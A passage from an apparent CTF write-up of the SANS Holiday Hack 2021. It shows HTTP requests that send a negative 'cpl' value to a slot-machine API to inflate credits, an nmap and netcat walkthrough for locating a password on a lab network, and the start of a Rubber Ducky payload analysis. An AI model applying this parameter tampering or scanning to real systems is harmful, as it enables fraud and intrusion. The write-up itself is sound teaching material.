class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;num_line&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;bet_amount&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;pull&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;WinAmount&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;-0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;FreeSpin&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;WildFixedIcons&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[],&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;HasJackpot&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;HasScatter&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;WildColumIcon&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;ScatterPrize&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;SlotIcons&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;wild&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon3&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon2&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon10&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon5&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon7&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;wild&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon3&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon9&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon8&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon4&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon3&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon9&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;scatter&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon3&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;ActiveIcons&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[],&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;ActiveLines&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[]},&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;response&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Wow!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Spin success&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It worked! Setting a negative &lt;code&gt;cpl&lt;/code&gt; transforms our losses in wins, and
our credit bank is now 120. Let's set a large negative &lt;code&gt;cpl&lt;/code&gt;, like -1000,
and see what happens:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/api/v1/02b05459-0d09-4881-8811-9a2a7e28fd45/spin&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;slots.jackfrosttower.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://slots.jackfrosttower.com/uploads/games/frostyslots-206983/index.html&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/x-www-form-urlencoded&lt;/span&gt;
&lt;span class="na"&gt;X-Ncash-Token&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;27d2b871-d3c4-42f1-86f0-008c7c74e6bf&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://slots.jackfrosttower.com&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;32&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="hll"&gt;betamount=1&amp;amp;numline=20&amp;amp;cpl=-1000
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 13 Dec 2021 13:45:06 GMT&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 13 Dec 2021 13:45:06 GMT&lt;/span&gt;
&lt;span class="na"&gt;X-Powered-By&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;PHP/7.4.26&lt;/span&gt;
&lt;span class="na"&gt;Cache-Control&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;no-cache, private&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;X-Ratelimit-Limit&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;60&lt;/span&gt;
&lt;span class="na"&gt;X-Ratelimit-Remaining&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;59&lt;/span&gt;
&lt;span class="na"&gt;Access-Control-Allow-Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;clear&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;success&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;credit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;20120&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;jackpot&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;free_spin&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;free_num&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;scaler&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;num_line&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;bet_amount&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;pull&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;WinAmount&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;-0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;FreeSpin&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;WildFixedIcons&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[],&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;HasJackpot&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;HasScatter&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;WildColumIcon&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;ScatterPrize&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;SlotIcons&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon4&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon2&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon9&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon3&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon8&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon9&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon4&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon10&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon5&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon6&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon8&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon9&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;ActiveIcons&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[],&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;ActiveLines&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[]},&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;response&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;I&amp;#39;m going to have some bouncer trolls bounce you right out of this casino!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Spin success&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ding, ding, ding! Our credit bank is now 20120. Sorry, Jack, but the house
lost this time. Jack Frost is not happy, here's what the &lt;code&gt;data.response&lt;/code&gt;
says: &lt;code&gt;I'm going to have some bouncer trolls bounce you right out of this casino!&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-5"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id17"&gt;Objective 5:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="jewel-loggins-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id18"&gt;Jewel Loggins's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We must find a password to run the candy striper machine. This password is
stored on another machine in the network. Let's take a look at our network
interface:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Tools:&lt;/span&gt;

&lt;span class="go"&gt;* netcat&lt;/span&gt;
&lt;span class="go"&gt;* nmap&lt;/span&gt;
&lt;span class="go"&gt;* ping / ping6&lt;/span&gt;
&lt;span class="go"&gt;* curl&lt;/span&gt;

&lt;span class="go"&gt;Welcome, Kringlecon attendee! The candy striper is running as a service on&lt;/span&gt;
&lt;span class="go"&gt;this terminal, but I can&amp;#39;t remember the password. Like a sticky note under the&lt;/span&gt;
&lt;span class="go"&gt;keyboard, I put the password on another machine in this network. Problem is: I&lt;/span&gt;
&lt;span class="go"&gt;don&amp;#39;t have the IP address of that other host.&lt;/span&gt;

&lt;span class="go"&gt;Please do what you can to help me out. Find the other machine, retrieve the&lt;/span&gt;
&lt;span class="go"&gt;password, and enter it into the Candy Striper in the pane above. I know you&lt;/span&gt;
&lt;span class="go"&gt;can get it running again!&lt;/span&gt;


&lt;span class="gp"&gt;elf@dd3a06de993f:~$&lt;/span&gt; ip a
&lt;span class="go"&gt;1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;/span&gt;
&lt;span class="go"&gt;    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;/span&gt;
&lt;span class="go"&gt;    inet 127.0.0.1/8 scope host lo&lt;/span&gt;
&lt;span class="go"&gt;       valid_lft forever preferred_lft forever&lt;/span&gt;
&lt;span class="go"&gt;    inet6 ::1/128 scope host&lt;/span&gt;
&lt;span class="go"&gt;       valid_lft forever preferred_lft forever&lt;/span&gt;
&lt;span class="go"&gt;11066: eth0@if11067: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP group default&lt;/span&gt;
&lt;span class="go"&gt;    link/ether 02:42:c0:a8:a0:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;    inet 192.168.160.3/20 brd 192.168.175.255 scope global eth0&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;       valid_lft forever preferred_lft forever&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;    inet6 2604:6000:1528:cd:d55a:f8a7:d30a:2/112 scope global nodad&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;       valid_lft forever preferred_lft forever&lt;/span&gt;
&lt;span class="go"&gt;    inet6 fe80::42:c0ff:fea8:a003/64 scope link&lt;/span&gt;
&lt;span class="go"&gt;       valid_lft forever preferred_lft forever&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Uh, looks like we have an IPv4 address and an IPv6 address. The network mask
of our IPv6 address is quite large, so scanning across it would be too long.&lt;/p&gt;
&lt;p&gt;Let's focus on the IPv4 network for now:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@dd3a06de993f:~$&lt;/span&gt; nmap -sP &lt;span class="m"&gt;192&lt;/span&gt;.168.160.3/20
&lt;span class="go"&gt;Starting Nmap 7.70 ( https://nmap.org ) at 2021-12-31 13:34 UTC&lt;/span&gt;
&lt;span class="go"&gt;Nmap scan report for 192.168.160.1&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.00028s latency).&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Nmap scan report for ipv6-server.ipv6guest.kringlecastle.com (192.168.160.2)&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Host is up (0.00031s latency).&lt;/span&gt;
&lt;span class="go"&gt;Nmap scan report for dd3a06de993f (192.168.160.3)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.00016s latency).&lt;/span&gt;
&lt;span class="go"&gt;Nmap done: 4096 IP addresses (3 hosts up) scanned in 68.64 seconds&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We have what looks like an IPv6 server! Let's scan it using &lt;code&gt;nmap&lt;/code&gt; with
its &lt;code&gt;-6&lt;/code&gt; option:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@dd3a06de993f:~$&lt;/span&gt; nmap -6 ipv6-server.ipv6guest.kringlecastle.com
&lt;span class="go"&gt;Starting Nmap 7.70 ( https://nmap.org ) at 2021-12-31 13:36 UTC&lt;/span&gt;
&lt;span class="go"&gt;Nmap scan report for ipv6-server.ipv6guest.kringlecastle.com (2604:6000:1528:cd:d55a:f8a7:d30a:e405)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.000088s latency).&lt;/span&gt;
&lt;span class="go"&gt;Other addresses for ipv6-server.ipv6guest.kringlecastle.com (not scanned): 192.168.160.2&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 998 closed ports&lt;/span&gt;
&lt;span class="go"&gt;PORT     STATE SERVICE&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;80/tcp   open  http&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;9000/tcp open  cslistener&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Two TCP ports. Let's start with the web port, using &lt;code&gt;curl -6&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@dd3a06de993f:~$&lt;/span&gt; curl -6 http://ipv6-server.ipv6guest.kringlecastle.com
&lt;span class="go"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;Candy Striper v6&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;&amp;lt;marquee&amp;gt;Connect to the other open TCP port to get the striper&amp;#39;s activation phrase!&amp;lt;/marquee&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we're told to connect to the other open TCP port. Since we don't know
the service, we'll connect using &lt;code&gt;netcat&lt;/code&gt; (still with the &lt;code&gt;-6&lt;/code&gt;
option):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@dd3a06de993f:~$&lt;/span&gt; netcat -6 ipv6-server.ipv6guest.kringlecastle.com &lt;span class="m"&gt;9000&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;PieceOnEarth&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The password to start the candy striper is &lt;code&gt;PieceOnEarth&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="strange-usb-device"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id19"&gt;Strange USB Device&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Apparently, the elves found a strange USB device, and we're asked to help with
the investigation. Let's talk to Morcel Nougat:&lt;/p&gt;
&lt;img alt="Morcel Nougat. They're an elf wearing a white t-shirt, a brown skirt, a pink Christmas hat, and black shoes. They are smiling." class="align-center" src="/images/sans-christmas-challenge-2021/morcelnougat.png" /&gt;
&lt;p&gt;&lt;em&gt;Morcel Nougat says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hello and welcome to the speaker _Un_Preparedness Room!&lt;/p&gt;
&lt;p&gt;I'm Morcel Nougat, elf extraordinaire.&lt;/p&gt;
&lt;p&gt;I've heard the talks at the other con across the way are a bit... off.&lt;/p&gt;
&lt;p&gt;I really don't think they have the right sense about what makes for a wonderful holiday season. But, anyway!&lt;/p&gt;
&lt;p&gt;Say, do you know anything about USB Rubber Duckies?&lt;/p&gt;
&lt;p&gt;I've been playing around with them a bit myself.&lt;/p&gt;
&lt;p&gt;Please see what you can do to help solve the Rubber Ducky Objective!&lt;/p&gt;
&lt;p&gt;Oh, and if you need help, I hear Jewel Loggins, on this floor outside this room, has some experience.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, this USB device seems to be a &lt;a class="reference external" href="https://hak5.org/blogs/usb-rubber-ducky"&gt;Rubber Ducky&lt;/a&gt;,
a USB drive that mimicks a keyboard and can simulate keyboard strokes. A
favorite for every pentester doing physical engagements. Let's see what we can
find:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;A random USB device, oh what could be the matter?&lt;/span&gt;
&lt;span class="go"&gt;It seems a troll has left this, right on a silver platter.&lt;/span&gt;
&lt;span class="go"&gt;Oh my friend I need your ken, this does not smell of attar.&lt;/span&gt;
&lt;span class="go"&gt;Help solve this challenge quick quick, I shall offer no more natter.&lt;/span&gt;

&lt;span class="go"&gt;Evaluate the USB data in /mnt/USBDEVICE.&lt;/span&gt;

&lt;span class="gp"&gt;elf@8d20656cc784:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's see what's inside &lt;code&gt;/mnt/USBDEVICE&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@8d20656cc784:~$&lt;/span&gt; ls /mnt/USBDEVICE
&lt;span class="go"&gt;inject.bin&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Just one file, &lt;code&gt;inject.bin&lt;/code&gt;. According to &lt;a class="reference external" href="https://docs.hak5.org/hc/en-us/articles/360010471234-Writing-your-first-USB-Rubber-Ducky-Payload"&gt;the documentation&lt;/a&gt;,
this contains the Rubber Ducky payload. However, it's encoded, and therefore
not directly human-readable. Let's see in our home folder if anything can
help:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@8d20656cc784:~$&lt;/span&gt; ls
&lt;span class="go"&gt;mallard.py*&lt;/span&gt;
&lt;span class="gp"&gt;elf@8d20656cc784:~$&lt;/span&gt; ./mallard.py
&lt;span class="go"&gt;usage: mallard.py [-h] [--file FILE] [--no_analyze] [--output_file OUTPUT_FILE]&lt;/span&gt;
&lt;span class="go"&gt;                  [--analysis_file ANALYSIS_FILE] [--debug]&lt;/span&gt;

&lt;span class="go"&gt;optional arguments:&lt;/span&gt;
&lt;span class="go"&gt;  -h, --help            show this help message and exit&lt;/span&gt;
&lt;span class="go"&gt;  --file FILE, -f FILE  The file to decode, default: inject.bin&lt;/span&gt;
&lt;span class="go"&gt;  --no_analyze, -A      Include this switch to turn off analysis of the duckyfile&lt;/span&gt;
&lt;span class="go"&gt;  --output_file OUTPUT_FILE, -o OUTPUT_FILE&lt;/span&gt;
&lt;span class="go"&gt;                        File to save decoded ducky script to. Default will print duckyfile to&lt;/span&gt;
&lt;span class="go"&gt;                        screen.&lt;/span&gt;
&lt;span class="go"&gt;  --analysis_file ANALYSIS_FILE&lt;/span&gt;
